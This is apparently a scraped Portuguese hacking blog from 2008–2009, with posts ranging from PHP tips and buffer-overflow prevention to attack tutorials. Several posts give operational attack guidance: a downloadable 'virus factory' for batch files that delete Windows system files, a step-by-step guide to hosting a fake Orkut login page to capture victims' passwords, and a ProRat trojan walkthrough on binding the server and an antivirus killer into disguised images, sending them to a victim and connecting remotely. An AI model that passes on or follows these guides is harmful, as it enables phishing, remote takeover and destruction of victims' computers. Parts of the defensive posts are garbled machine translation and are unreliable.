..:Tuto-Hacker:..

Novo site

2009-02-19T19:34:00.000-08:00

Eu criei um novo site muito melhor que esse ainda está em construção mais já tem dezenas de tutoriais ele e o Melhor.

www.invasoeshacker.blogspot.com

Agora não será postado mais nada no Tuto-Hacker agora eu vou postar nesse novo site !

AVISO !!!

2009-01-05T10:59:00.000-08:00

Em breve o site vai ter um novo endereço o proximo site terá dicas discobertas por mim eu fiquei um bom tempo sem postar aqui nesse site por que eu e meus amigos ficamos procurando pontos fracos em windows e linux agora nois achamos e em breve nois colocaremos todos no site tudo bem !

By: Rafael

Fabrica de Virus

2008-12-24T18:20:00.000-08:00

Você está consado de ficar criando virus.bat, por que agora tem uma Fabrica de Virus ele fabrica seus virus.bat agora você pode criar varios tipos de virus lá você irá encontrar esses virus.

VIRUS DE DESTRUICAO

1 - Criar VIRUS Que Deleta a Pasta Do Windows
2 - Criar VIRUS Que Exclui Todas as DLL'S Do System32
3 - Criar VIRUS Que Exclui o Explorer.exe
4 - Criar VIRUS Que Exclui o Regedit.exe
5 - Criar VIRUS Que Deleta Tudo Que Nao Esta Sendo Usado
═══════════════════════════════════════════════════

VIRUS DE IRRITACAO

6 - Criar VIRUS Que Desliga o Computador
7 - Criar VIRUS De Sacanagem Para Abrir Programa Ou Site Simultaneamente
8 - Criar VIRUS Que Cria Quantas Pastas Quiser No Desktop
9 - Criar VIRUS Que Abre Infinitas Mensagens De Alerta Com Sua Mensagem
═══════════════════════════════════════════════════

COISAS INOFENCIVAS

10 - Criar REGISTRO Que Muda o Nome Da Lixeira
11 - Criar REGISTRO Que Muda o Titulo Do Internet Explorer
12 - Criar Falso VIRUS Para Enganar Seus Amigos
13 - Criar VIRUS Que Emite Bipes Sem Parar
═══════════════════════════════════════════════════

Clike abaixo para fazer Download:

Coleção INFO Banco De Dados

2008-12-09T06:52:00.000-08:00

Coleção INFO Banco De Dados | Revista INFO focada em Banco de Dados, mostra a diferença entre os bancos existentes hoje em dia.

Tamanho: 29 MB
Formato: PDF
Site: Rapidshare.com

Download:

Previnindo Buffer Overflow

2008-12-09T06:47:00.000-08:00

Previnindo Buffer Overflow | Vulnerabilidades de buffer overflow são resultado da má Validação de entradas: elas permitem que um atacante execute código no seu discurso como a vítima. Mesmo quando houve o cuidado de validar todas as entradas, os erros podem escorregar e fazer o pedido através de insegurança. Este artigo apresenta as várias opções disponíveis para proteção contra buffer overflows. Esses métodos, quer para verificar inseguro função chamadas estaticas, procure por Overflow dinâmico durante a execução ou ou impeça a execução de código na pilha.

# Pilha não executável: Neste método, a pilha está configurado para não possuir nenhum código executável. Patches do kernel estão disponíveis tanto para Linux e Solaris, para configurar uma pilha não-executável. Data Execution Prevention em 2003 e Windows XP também proteger a pilha de buffer overflow. Este método baseia-pilha protege contra ataques de buffer overflow. Heap overflow é baseado em dados estáticos seguidos overflows, no entanto, não podem ser impedidas por esta técnica.

# Analise statica: Na análise estática do código fonte é analisado para chamadas perigosas na biblioteca condições de detectar potenciais buffer overflows. Funções como sprintf eo strcpy, são vulneráveis a buffer overflows, etc código fonte scanners são usados para procurar por uso incorreto destas funções. RATOS tala e são esses dois instrumentos, no entanto análise estática está crivada de falsos positivos.

# Runtime Proteção dinâmica: Se condições forem detectados durante o atual funcionamento do programa, neste método, e um ataque frustrado. Diferentes técnicas de análise dinâmica runtime são:

anary: Quando é feita uma chamada de função, um "canário" é adicionado ao endereço de retorno; se um buffer overflow ocorre, o canarinho vai ser corrompidos. Então, antes de retornar à função mãe, o "canário" está marcada novamente para ver se ele tiver sido modificado. Guarda pilha usa essa técnica, implementando-o como um patch para o compilador GCC, o que provoca atrasos mínimos de desempenho. Free BSD também tem um patch disponível para o fazer.

Copiando o indereço de retorno: Neste método, o endereço de retorno é guardado em separado, por isso mesmo quando um buffer overflow explorar sobrescreve o endereço de retorno na pilha, é um retrocesso para o valor original quando a função retorna. Stack Blindagem - uma ferramenta de desenvolvimento que usa essa técnica - funciona como um arquivo assembler e transformador é apoiado por CGC / G + + front ends. Blindagem pilha no entanto, só protege contra a sobreposição do endereço de retorno.

Array limites Verificação: Quando um array é lido ou escrito para, esta técnica dupla verifica se os limites estão a ser violados. Compaq C Compiler e Jones & Kellyâ € ~ s GCC patch array cabe a realizar testes, mas custa da degradação considerável desempenho.

Memory Access verificação: Aqui, a verificação é adicionada ao código binário quando o programa é compilado. Ele verifica violações acessar em tempo real. Ferramentas como Purificar oferecem essa proteção, com pouco impacto no desempenho.

Use versões e funções mais seguras: Alternativas safer estão disponíveis para todas as funções tradicionais atormentado por um buffer overflow. Por exemplo, strncpy snprintf e são mais seguros do que os mais velhos e strcpy sprint. Quando estão a ser desenvolvidas novas aplicações, garantir que apenas as variantes mais seguras são usadas.

25 Dicas Para Melhorar o PHP

2008-12-09T06:34:00.000-08:00

25 Dicas Para Melhorar o PHP | 1- Se um método pode ser static, declare-o como static. Isso irá aumentar a performance por volta de 4 vezes;

2- Echo é mais rápido do que print;

3- Utilize o unset nas suas variáveis para liberar memória (bons tempos em que todo mundo sabia programar em C :P.. “free your mallocs”);

4- Não use require_once();

5- Utilize o caminho absoluto na hora de dar os includes, assim o PHP não perde tempo tentando resolver o caminho;

6- str_replace é mais rápido do que preg_replace porém strtr é umas 4 vezes mais rápido do que str_replace;

7- Utilizar @ para suprimir os erros é muito lento;

8- Habilite o mod_deflate no apache;

9- Feche a sua conexão com o banco se você não irá mais utilizá-la (mas não fique abrindo e fechando toda hora!);

10- $row['abc'] é 7 vezes mais rápido do que $row[abc];

11- Não use funções dentro de um laço, como por exemplo, for ($x=0; $x < x="0," c="count($array);">atributo++, por exemplo) é 3 vezes mais lento do que acessar uma variável local;

12- Incrementar uma variável global é duas vezes mais lento do que incrementar uma variável local;

13- Acessar um atributo de um objeto ($obj->atributo++, por exemplo) é 3 vezes mais lento do que acessar uma variável local;

14- Incrementar uma variável local não inicializada é de 9 à 10 vezes mais lento do que se ela tivesse sido inicializada;

15- Aspas simples são mais rápidas que aspas duplas;

16- Uma aplicação que faça cache dos scripts php vai aumentar a performance entre 25 e 100%;

17- Utilize cache sempre que possível. SEMPRE! (claro que isso tem um onus, mas estamos falando apenas em performance aqui);

18- Se quiser testar o tamanho de uma string, utilize isset ao invés de strlen. Por exemplo: if (!isset($foo{5})) echo “foo eh mto pequeno!”;

19- Nem tudo precisa ser OO. Métodos e objetos tendem a consumir muito mais memória;

20- Não converta toda estrutura de dados em classes. Utilizar arrays é muito mais rápido e inteligente;

21- Se você possui funções que demandam muito tempo de execução cogite transforma-las em uma extensão em C;

22- Habilitar o mod_gzip pode economizar em até 80% o tráfego de dados. Sua largura de banda agradece;

23- Evite usar SELECT *. Isso dificulta a manutenção e gasta tempo desnecessário de processamento para descobrir os campos e obter os valores do banco;

24- Use switch ao invés de um monte de ifs;

25- json é mais rápido do que xml.

Não vou mentir: pelo menos metade da dicas não ponho em prática

menu de escolha em um arquivo.bat

2008-12-05T09:56:00.000-08:00

Bom hoje irei ensinar como fazer um menu de escolha em um arquivo.bat.

O comando para fazer o menu em um arquivo.bat é esse.

set /p opcao=Digite qualquer coisa aqui.

if %opcao% equ 1 goto 1

Obs: No lugar do "1" você pode colocar qualquer coisa.
exemplo.

if %opcao% equ 1 goto hackers

Eu vou dar um exemplo de como você vai usar esse comando.

@ECHO OFF
ECHO Que Programa você deseja abrir?
ECHO.
ECHO 1 - Bloco de Notas
ECHO 2 - Paint
ECHO 3 - Calculadora
ECHO.
ECHO.
:aff
SET /P OPCAO= Digite sua escolha--
IF %OPCAO% EQU 3 GOTO calc
IF %OPCAO% EQU 2 GOTO paint
IF %OPCAO% EQU 1 GOTO notepad
:calc
CLS
calc.exe
ECHO Abrindo...Calculadora.
ECHO.
ECHO.
goto aff
:paint
CLS
mspaint.exe
ECHO Abrindo...Paint.
ECHO.
ECHO.
goto aff
:notepad
CLS
notepad.exe
ECHO Abrindo...Bloco de Notas.
ECHO.
ECHO.
goto aff

É só isso.

Faça um download para demostração como vai ficar.
Clike aqui para fazer o Download.

Clike aqui para baixar programa para converter .bat para .exe
Clike aqui para fazer o Download.

Esse tutorial foi feito por Rafael.

Criando Sua Pagina Fake Do Orkut

2008-12-05T09:07:00.000-08:00

Criando Sua Pagina Fake Do Orkut | Nesse tutorial estarei ensinando a criar sua pagina fake do orkut e para as pessoas que não conseguirem estarei colocando uma pagina fake de minha autoria.

1- baixem sua pagina fake (pagina falsa) =>LINK PARA BAIXAR
2- Entrem no site : http://www.110mb.com .

3- Clique na seguinte imagem :

4- Vamos completar os recipientes pedido.

* Username: Coloque o nome do seu site; ex : paginafalsodoorkut.
* Password: Uma senha de 5 a 15 caracteres.
* Your Primary Email Address: Coloque uma email válido.
* Terms of Service - Signature : escreva => I will never engage in phishing or abusive actions on 110mb
* Human Validation: Digite os caracteres da imagem abaixo.
Por fim : Create My Account Now

Veja a imagem :

5- Feito isso voçê vai na sua caixa de entra do e-mail que coloco no registro e entrem no link que eles vão te mandar.

6- Chegando la aparecera os seguintes campos a serem completados:

Dica: Procure um gerador na internet para colocar dados falsos.

7- Se Voçê tiver feito tudo certo aparecera isso :

Account created successfully!

Taking you to 110MB homepage in 5 sec...

8- Agora vamos públicar a pagina fake,usando o Filezilla :

http://baixaki.ig.com.br/download/FileZilla.htm (link para baixar)

9- Abra o programa,e escreva :

HOST: seusite.110mb.com
ÙSUARIO: Nome do site (ex se o site for : www.exemplo.110mb.com o nome é exemplo.

SENHA: A senha escolhida

PORTA: 21
E clique em CONEXAO RAPIDA

10- Feito isso envie os arquivos da pagina fake para o servidor.

11- Agora e só enviar o link do site para a ''vítima''. E para ver a senha é so colocar /users.txt no final.

Ex : www.seusite.110mb.com/USERS.TXT

ProRat Com Conexão Direta

2008-12-05T08:55:00.000-08:00

Bom galera, como vejo muita gente com dúvidas sobre o ProRat, eu criei esse tutorial para tentar evitar essas dúvidas. Então vamos ao tutorial!

Obs.: Nesse tutorial não vou usar nem um tipo de programa para proteger o servidor (ex: Themida, EXE Protectot, etc..) para evitar que o arquivo se corrompa e evitar que ocorra algum outro erro.

Vamos precisar:

ProRat
AvKill
Binder
ResHacker
Todos os tools (programas) citados acima podem ser baixados no link ao lado: LINK
Senha de Descompactação: www.invasao.com.br

Após ter baixado as ferramentas, extraia em algum lugar, lembrando que antes de baixa-los, desative seu anti-vírus ou qualquer outra proteção residente, porquê como o ProRat é uma ferramenta hacker, o anti-vírus vai detectar…

Agora já baixou, vá até a pasta do ProRat e execute-o, a primeira coisa que vamos fazer é bota o idioma do programa para Português, para ficar mais fácil o entendimento. Veja a imagem:

Agora que o programa esta todo em português, vamos criar nosso servidor (server). Clique no botão Criar depois selecione a opção Criar Servidor ProRat (342 Kbayt)

Aqui vou criar um servidor de conexão direta, então não vou precisar do NO-IP e sim do IP da vítima que mais à frente veremos como obte-lo. Então em Notificações desmarque todas as opções!

Clique em Configurações nessa área você configura a senha do servidor, o nome da vítima e etc…A senha aqui eu vou deixar a padrão que é: 123456 caso queira mudar, fique a vontade.

Você também pode fazer com que o servidor assim que executado exiba uma mensagem de erro falsa, eu acho isso desnecessário, mas caso queira é só marca a opção: Dar uma mensagem de erro falsa e clicar no botão Mensagem que fica ao lado da opção, depois vai aparecer uma janela, ai você digita a mensagem e da OK…Vou deixar essa opção desmarcada!

Em Juntar com Arquivo, não precisa usar isso, isso nós vamos fazer com o Binder.
Na área Extenções você escolher qual vai ser a extenção do servidor. A unica extenção que suporta ícone e a EXE então eu vou optar por essa mesmo.

Na área ícone, selecione um ícone à seu gosto, é só clicar no ícone que quiser, caso não tenha nem um que você goste, você pode clicar no botão Escolher ícone e selecionar seu ícone. logo em seguida clique em Criar Servidor e de OK na mensagem.

Pronto! Servidor criado:

Agora nós vamos junta-lo com outro arquivo, mas antes vamos junta um AvKill com outro arquivo. Como dito no inicio do tutorial eu não vou usar programas para proteger o servidor, então primeiro vou manda o Av Kill para a vítima…Esperar um tempo até que o anti-vírus dela seja finalizado e depois vou mandar o servidor ProRat.
Então vamos juntar o AvKill com um outro aqui qualquer, aqui eu vou juntar com imagem, então para isso precisaremos de um binder. Então vá ate a pasta do binder e execute-o, aparecerá a seguinte janela:

Copie o código e clique em Enter Serial!
Espere o Binder abrir, após isso clique em Add Arquivo e selecione o AVKill (OBS: eu botei 2 AvKill’s, um esta em batch (.bat) e o outro esta como *.exe), eu vou usar o que esta como *.exe pq ele roda em qualquer versão do Windows já o em batch (*.bat) não. Mais isso fica a critério de vocês.
OBS: o AVKill em EXE roda em modo oculto já o em batch não!

Agora clique em Add Arquivo e selecione outro arquivo, pode ser imagem ou arquivo…Aqui eu botei um imagem. Depois clique em Alterar ícone. Como eu vou juntar o AvKill com imagem, então eu vou botar um ícone de imagem para disfarçar

Depois clique em •Juntar, digite o nome do arquivo, selecione um extensão e clique em salvar. Aqui eu botei extensão *.exe e o nome: Arquivo1

Vai aparecer a seguinte mensagem, de OK nela!

Agora vamos limpar o arquivo que nós juntamos no binder, clique com o botão direito em cima do arquivo e em seguida clique em Remover. Faça isso nos 2 arquivos!

Agora vamos adicionar nosso servidor com outro arquivo…Pode ser qualquer um…Aqui eu optei por imagem também. Repita o mesmo processo que eu explique acima…Sobre adicionar o AvKill + Imagem…Escolher o ícone…
Aqui eu salvei como Arquivo2. Salve com o nome que vc quiser!

Agora vamos tirar meu nome das informações do arquivo, então abra o ResHacker, vá em Arquivo, Abrir e selecione o arquivo que foi gerado pelo binder que no meu caso foi (AvKill + imagem).

Vá até Version Info e apague os nomes: 4EveR, X, 1.00, 1.00, THiaG04EveR, THiaG04EveR.dll

Agora vá em Arquivo e clique em Salvar. Faça o mesmo com o arquivo em que foi juntando o Servidor e a Imagem, e salve também. Feito isso zipe o arquivo em que esta o AvKill e a imagem e mande para a vítima.
Agora vem a parte de pegar o IP da vítima, vc pode fazer isso usando este programa Aqui ou pelo famoso MS-DOS. Eu vou fazer pelo DOS mesmo, então envie o arquivo à vítima, imediatamente vá em Inicia, Executar e digite cmd e de ENTER, vai aparecer a tela preta do DOS então digite exatamente:

netstat -n

OBS¹: Feche todas as páginas da web que estão abertas em sua maquina, pois vai aparecer o IP das páginas também, ai vai confundir tudo…
OBS²: Não acredite nesses caras que falam que o IP da vítima é sempre o que começa com 200 ou 201 ¬¬ Isso é furada! Nem sempre começa com 200 ou 201.Aqui no meu caso o IP da vítima é o: 192.168.0.126Dica: Va tentando os IP’s de cima para baixo, como eu fiz. Geralmente o IP da vítima é o ultimo que esta escrito ao lado: ESTABLISHED

Depois é só colocar o IP la no ProRat e clicar em Conectar

Se tudo ocorrer bem vai aparecer a janela para vc botar a senha, ai vc bota a senha que vc configurou la na criação do servidor. Dite-a e clique em OK.
Pronto Conectado !

Bom e por aqui fica o tutorial espere que tenham conseguido entender alguma coisa. Tentei ser o mais detalhado possível.

Entendendo e Evitando a Engenharia Social Protegendo Sistemas e Informações

2008-12-05T08:53:00.000-08:00

Entendendo e Evitando a Engenharia Social Protegendo Sistemas e Informações | Atualmente, informação constitui um bem de suma importância para as organizações dos mais variados segmentos. A Internet popularizada ao longo dos anos 90 permitiu a troca e disponibilidade de informações por meio da WWW (World Wide Web). Outros mecanismos de comunicação e troca de informações como correio eletrônico também têm proporcionado benefícios no uso profissional e pessoal. Note que a informação compreende qualquer conteúdo que possa ser armazenado ou transferido de algum modo, servindo a determinado propósito e sendo de utilidade ao ser humano. Dentro do universo de informações, muitas delas têm valor pessoal ou mesmo organizacional. Na grande maioria das situações, usuários de informações desconhecem seu valor e pode colocar a si ou uma instituição numa condição vulnerável, principalmente, quando diante de um engenheiro social, conforme discutido abaixo.

Necessidade de Proteger Sistemas
No contexto apresentado acima, a necessidade de prover segurança da informação e sistemas de informações tem sido uma questão constante nas organizações. A segurança da informação visa proteger os sistemas através de um conjunto de medidas que preservam informações e sistemas de informações, assegurando-lhes integridade, não repúdio, disponibilidade, autenticidade e confidencialidade.

Embora a grande maioria das organizações e usuários comuns possua mecanismos técnicos defensivos contra ataques, os quais exigem o usuário informar não apenas seu login (ou nome de usuário num sistema) e respectiva senha, bem como verifica a existência de vírus em arquivos, ainda assim os sistemas atuais são susceptíveis a ataques não técnicos decorrentes da engenharia social.

Considere a situação na qual um executivo de uma companhia, o qual na realidade não é funcionário dessa companhia, faz uma ligação telefônica ao administrador de sistemas dessa companhia. O executivo (i.e. engenheiro social ou hacker social) informa ao administrador de sistemas que se encontra numa viagem de negócios fora da cidade e precisa ter acesso a um relatório de um cliente a fim de fechar um negócio de milhões de reais. Em razão disto, solicita que o administrador de sistemas troque sua senha, permitindo-lhe digitar nova senha, pois do contrário ele não terá acesso ao relatório do cliente e, conseqüentemente, perderá um negocio de milhões. O administrador, então, tentando ajudá-lo emite um comando de reset para o login daquele usuário e, a partir daí, o suposto executivo obtém acesso privilegiado ao sistema da companhia, sem ter a necessidade de passar por qualquer mecanismo de detecção de intrusão.

Entendendo a Engenharia Social
Engenharia social, dentro da área de segurança de sistemas computacionais, é um termo utilizado para qualificar os tipos de intrusão não técnica, que coloca ênfase na interação humana e, freqüentemente, envolve a habilidade de enganar pessoas objetivando violar procedimentos de segurança. Um aspecto relevante da engenharia social compreende a inaptidão dos indivíduos manterem-se atualizados com diversas questões pertinentes a tecnologia da informação, além de não estarem conscientes do valor da informação que eles possuem e, portanto, não terem preocupação em proteger essa informação.

É importante salientar que, independente do hardware, software e plataforma utilizada, o elemento mais vulnerável de qualquer sistema é o ser humano, o qual possui traços comportamentais e psicológicos que o torna susceptível a ataques de engenharia social. Dentre essas características, pode-se destacar:

Vontade de ser útil – O ser humano, comumente, procura agir com cortesia, bem como ajudar outros quando necessário.

Busca por novas amizades – O ser humano costuma se agradar e sentir-se bem quando elogiado, ficando mais vulnerável e aberto a dar informações.

Propagação de responsabilidade – Trata-se da situação na qual o ser humano considera que ele não é o único responsável por um conjunto de atividades.

Persuasão – Compreende quase uma arte a capacidade de persuadir pessoas, onde se busca obter respostas específicas. Isto é possível porque as pessoas têm características comportamentais que as tornam vulneráveis a manipulação.

Importante observar que o sucesso da engenharia social depende da compreensão do comportamento do ser humano, além da habilidade de persuadir outros a disponibilizarem informações ou realizarem ações desejadas pelo engenheiro social. Perceba ainda que o medo de perder seu emprego ou vontade de ascender pode resultar na entrega de informação de natureza proprietária. Nesse sentido, observa-se que a engenharia social possui uma seqüência de passos na qual um ataque pode ocorrer:

Coleta de informações – O hacker ou engenheiro social busca as mais diversas informações dos usuários como número de CPF, data de nascimento, nomes dos pais, manuais da empresa, etc. Essas informações ajudarão no estabelecimento de uma relação com alguém da empresa visada.

Desenvolvimento de relacionamento – O engenheiro social explora a natureza humana de ser confiante nas pessoas até que se prove o contrário.

Exploração de um relacionamento – O engenheiro social procura obter informações da vítima ou empresa como, por exemplo, senha, agenda de compromissos, dados de conta bancária ou cartão de crédito a serem usados no ataque.

Execução do ataque – O hacker ou engenheiro social realiza o ataque a empresa ou vítima, fazendo uso de todas informações e recursos obtidos.

Evitando a Engenharia Social

Especialistas afirmam que a medida que nossa sociedade torna-se cada vez mais dependente da informação, a engenharia social tende a crescer e constituir-se numa das principais ameaças aos sistemas de segurança das (grandes) organizações. Entretanto, embora as situações apresentadas acima sejam um tanto indesejáveis e até certo ponto assustadoras, há mecanismos através dos quais uma organização pode implementar a fim de detectar e prevenir ataques de engenharia social. Tais medidas visam, principalmente, atenuar a participação do componente humano. Essas medidas compreendem:

Educação e Treinamento – Importante conscientizar as pessoas sobre o valor da informação que elas dispõem e manipulam, seja ela de uso pessoal ou institucional. Informar os usuários sobre como age um engenheiro social.

Segurança Física – Permitir o acesso a dependências de uma organização apenas às pessoas devidamente autorizadas, bem como dispor de funcionários de segurança a fim de monitorar entrada e saída da organização.

Política de Segurança – Estabelecer procedimentos que eliminem quaisquer trocas de senhas. Por exemplo, um administrador jamais deve solicitar a senha e/ou ser capaz de ter acesso a senha de usuários de um sistema. Estimular o uso de senhas de difícil descoberta, além de remover contas de usuários que deixaram a instituição.

Controle de Acesso – Os mecanismos de controle de acesso tem o objetivo de implementar privilégios mínimos a usuários a fim de que estes possam realizar suas atividades. O controle de acesso pode também evitar que usuários sem permissão possam criar/remover/alterar contas e instalar software danosos a organização.

Tenho observado que gasto milhares de reais na aquisição de ferramentas de segurança (detecção de intrusão, firewalls, etc) a fim de dotarem seus sistemas de maior segurança. Todavia, a maioria das empresas acredita que a solução, unicamente, técnica garantem a segurança dos sistemas. Embora eu concorde que a solução técnica seja necessária, ela por si só não é suficiente. É preciso também considerar o componente humano de um sistema de segurança da informação a fim de minimizar ou quiçá minimizar a vulnerabilidade de sistemas.

Artigo Como Programar Melhor

2008-12-05T08:51:00.000-08:00

Artigo Como Programar Melhor | Tenha Calma. Se você não conseguir de primeira não é motivo para jí ir desistindo e passando a bola para o pessoal do forum ou lista de discussão. Se você não perseverar, o lado negro da força dominarí você e a mediocridade eterna serí a sua recompensa profissional. Programação exige, entre outras coisas, muita perseverança.

Tente Entender. Se a dúvida é sua, assuma a responsabilidade, tente entender a resposta que te foi dada exaustivamente antes de descartí-la. Porque? Bom, porque muitas vezes ela estí certa e o seu conhecimento e/ou empenho é que não não foram suficientes. Faça o mesmo antes de aceití-la

O Passo Maior que a Perna. Se você não se garante em alguma coisa é porque ainda falta para você chegar lí. Tente começar pelo começo. De que adianta você fazer um programa usando código que te foi passado e você não entender bulhufas de como ele funciona? O bom programador é aquele que tem uma boa base, que conhece e domina o bísico da linguagem e cultiva uma boa lógica, o resto vem com o tempo e a necessidade.

Seja Humilde. A humildade é um fator crucial em qualquer profissão. Cultive-a, ela pode te ensinar muito, tanto no trabalho como na vida. Ninguém aqui precisa ser monge para cultivar a humildade, cultive-a pelo prazer de ser verdadeiro nas suas ações e honesto na sua profissão.

Seja Independente. Não fique esperando a ajuda de todos para realizar o que você quer. A tarefa tem que ser a sua principal motivação. Além do mais cada vez que alguém te entrega uma solução mastigada você deixa de aprender com o processo.

Nada é Complicado. Uma coisa complicada nada mais é do que o encadeamento de varias coisas simples. O erro é tentar resolver o problema inteiro com o estigma de acha-lo complicado na cabeça. Ao invés divida o problema em pedaços menores e mais simples e resolva-os ou divida de novo até ficar simples o suficiente. Feito isso o que sobrar jí não serí tão complicado. Note que isso não quer dizer que você ví resolver qualquer problema de agora em diante, mas jí da uma perspectiva bem melhor. Tome este conselho como uma maneira de ver as coisas, nada mais.

Não Abuse. Sua dúvida é primariamente problema seu. Os colegas, colaboradores e participantes de foruns e listas de discussão não estão aqui somente para ajuda-lo, portanto se você realmente preza a ajuda que recebe, contente-se com ela. Lembre-se que todos tem mais o que fazer do que ficar atendendo caprichos dos outros. Sua prova de apreciação é sempre bem vinda.

A César o que é de César. Dê crédito, se você usou código de alguém e esse código ajudou bastante o seu software mencione esta pessoa nos seus créditos afinal de contas ela trabalhou duro para que você não precisasse e nem estí te cobrando. Depois, qual é a graça de dizer ter feito algo quando você não fez? Pura massagem de ego!

Bom Senso é Tudo! Sem bom senso você estí perdido, pode considerar isso a pura verdade. Diante de uma situação complexa e aparentemente sem saàda, pare, relaxe e use o seu bom senso, escute os seus neurônios. Lembre-se que mesmo depois de ter seguido este conselho e o problema continuar lí não quer dizer que ele é insolúvel.

Nada é Impossàvel. Embora algumas coisas são quase. Pense que tem gente fazendo aqueles jogos 3D e portanto se aquilo é possàvel sua tarefa também deve ser. O importante é perseverar e manter uma atitude positiva diante da tarefa, não encare a tarefa como inimiga e sim como uma amiga que não fala a sua làngua.

Nunca Pare de Aprender. Se um dia você se cansar de aprender novas tecnologias em desenvolvimento, siga meu conselho: Mude de profissão. É exatamente o que eu vou fazer.

Tenha Curiosidade. Procure, pesquise e corra atrís. Isso ensina mais que muitos cursos por aà. A míquina é o computador e não você, portanto não se torne um autômato que apenas faz o necessírio e apenas sabe o suficiente.

Tenha Criatividade. Muitas vezes é o que distingue o bom programador do medàocre. Programação não é somente uma técnica, é também uma arte. Sem criatividade você estí a mercê da mesmice num mundo cada vez mais dinâmico e variado. Infelizmente criatividade não pode ser ensinada, tem que ser aprendida na prítica.

Faça Bem Feito. Seja detalhista e capriche em tudo até que isso fique automítico em você, essa atitude lhe renderí um diferencial importante nesta nossa profissão tão concorrida.

Seja Simples. A simplicidade é mígica e as pessoas de hoje tendem a complicar, portanto mantenha-se simples. Se estiver com 3 possàveis soluções para um problema tente a mais simples, é geralmente a mais eficaz.

Não Tenha Pressa. O aprendizado é uma estrada longa e cheia de obstículos, que começa no primeiro passo e termina quando você a abandona. Aprenda a separar pressa e deadline, de que adianta entregar no prazo se estí mal feito. O velho ditado vale: "A pressa é inimiga da perfeição".

--------------------------------------------------------------------------------------

Como escrever programas melhores

Traduzido por Walter Staeblein. Autor Desconhecido.

Como em qualquer tipo de empreendimento o difàcil estí sempre nos detalhes. Um programa pode parecer ótimo no papel mas se não for implementado com extrema atenção aos detalhes, usando técnicas de programação sólidas e com uma pitada de arte ele, de certo, serí um fracasso. Ele provavelmente vai cumprir a lista de tarefas, mas não vai ser atraente, intuitivo ou prítico.

A parte mais importante de se implementar um programa não é fazer as coisas funcionarem, é não deixa-las pifarem. Discute-se muito tratamento de erros, como captura-los, como manusea-los, etc... Estas coisas se fixam no que fazer depois do leite derramado. Elas são importantes para o sucesso do seu programa mas não se comparam a prevenção de erros, esta sim deve ser enfatizada.

Se colocamos prevenção de erros na mesa, é sempre no pratinho do pão. Prevenção de erros deve ser o prato principal do projeto e não uma simples sobremesa. Este artigo foca em técnicas de prevenção de erros e outros assuntos ligados ao desenvolvimento de software.

: : Clareza : :

Cada função ou procedimento deve ter um, e somente um, propósito claro. este propósito deve ser comunicado no primeiro comentírio. Assim como cada bloco comentado de código numa rotina deve ter só um claro propósito.

O mesmo se aplica a variíveis. Cada uma deve ter um só propósito. Variíveis multiuso devem ser reduzidas ao mànimo, e claramente identificadas como tal.

Seguindo esta regra geral a clareza do código vai ser melhorada e este vai ficar mais robusto e fícil de manter.

: : Escopo : :

Sempre considere o escopo. Suas variíveis são locais, modulares ou globais? Suas rotinas são públicas ou privadas?

Geralmente o escopo deve ser o mais restrito possàvel. Na dúvida, começe declarando a variível como local. Se ela for necessíria a outras rotinas do formulírio mude seu escopo para modular (vílida somente no módulo ou formulírio em que foi declarada). Por fim se for necessíria em outros módulos faça-a Global. Não se esqueça de mudar seu nome para que este reflita sua nova abrangência.

Mais uma vez, faça todo o possàvel para manter as variíveis locais. Modulares ou globais só devem ser declaradas se absolutamente necessírias. Passando variíveis como parâmetros de funções ou procedimentos (Subs) e criando propriedades num módulo de classe são alternativas muito mais reciclíveis e fíceis de mudar quando necessírio.

Quanto a funções, mantenha-as privadas a não ser que tenham que ser públicas. Isto diz respeito principalmente a funções em DLLs ou controles ActiveX. Não exponha nenhuma função ao usuírio sem ter certeza absoluta que todo o código de prevenção de erros estí no lugar e funcionando. Não exponha ao usuírio funções internas as quais ele não necessita.

Tente não usar constantes públicas desnecessírias. Embora sejam de grande valia elas fazem com que um módulo seja menos auto suficiente e reciclível.

: : Property Pages : :
Com VB, se você usa um controle complexo como um Grid que tem Property Pages, resista a tentação de marcar as propriedades do controle deste modo pois você se arrisca a perder todas se o controle for atualizado, se o .frx falhar ou ainda se algum problema não previsto acontecer. Na maioria das vezes o programador jí se esqueceu dos valores das propriedades inseridos deste jeito e vai levar algumas horas ou dias de tentativa e erro para remediar a situação.

Mais importante também é o fato de que outros programadores não vão saber que propriedades de um controle você mudou e porquê. Seu código vai ser bem mais fícil de entender e modificar se você marcar todas as propriedades em tempo de execução (em eventos e rotinas) com fartos comentírios.

: : Nomes : :
Nunca use os nomes criados pelo VB para seus controles, estes nomes não seguem as convenções da própria Microsoft. Eles indicam o tipo de controle mas não a função do mesmo dentro do programa.

Por isso sempre dê nomes descritivos e objetivos imediatamente após a criação do controle. Um nome apropriado consiste de um prefixo, normalmente 3 letras em caixa baixa, para indicar o tipo de controle, seguido de uma descrição da sua função no todo.

Por exemplo, um novo TextBox chamado de Text1 pelo VB. Ele deve ter seu nome imediatamente mudado para algo como txtNomeUsuario. Isto indica que se trata de um textBox que recebe o nome do usuírio.

Sempre use os prefixos padrão para que outros que venham a mexer no seu código entendam com mais facilidade. Abaixo estí uma lista com alguns tipos padrão para controles do VB:

frm - Form
txt - TextBox
lbl - Label
cmd - CommandButton
lst - ListBox
cmb - ComboBox
chk - CheckBox
opt - OptionButton
img - ImageBox
pic - PictureBox
vsc - Vertical ScrollBar
hsc - Horizontal ScrollBar
tmr - Timer
wsk - Winsock

: : Arcana : :
Sempre use o mais simples, direto e legàvel código possàvel. As duas linhas abaixo fazem a mesma coisa:

1. If bArrumaFrente = True Then S = "Cima" else S = "Baixo"

2. S = IIF(bArrumaFrente, "Cima", "Baixo")

A linha 1 é muito mais legàvel do ponto de vista humano. A 2 é mais complicada e demora mais tempo para a maioria dos programadores entender. É verdade que a linha 2 é mais compacta e avançada mas clareza deve estar sempre em primeiro lugar. Em C++ e Pascal existem muito mais maneiras de se mostrar com esse tipo de código arcano do que em VB.

: : Comentírios : :
Porquê me lixar em comentar meu código? Fui eu quem escreveu, daà não preciso de lembretes. De qualquer maneira um código fonte coeso é sempre auto explicativo e evidente. Comentar meu código seria dizer em voz alta que ele não é bom. Além disso, qualquer programador que reclamar que não consegue entender meu código por falta de comentírios é um maricão que não sabe de nada. Eu não tenho tempo de comenta-lo, quem sabe depois de terminado eu separo um tempinho para isso.

Estas são algumas reações naturais mas bitoladas que alguns programadores tem sobre comentírios. Comentírios são parte essencial de um código coeso e reciclível. O que parece óbvio num dia fica totalmente obscuro em outro. Se o programa é um sucesso, outros programadores vão, eventualmente, continua-lo. Algumas partes do código não serão óbvias a eles, não interessa quanta experiência eles tenham.

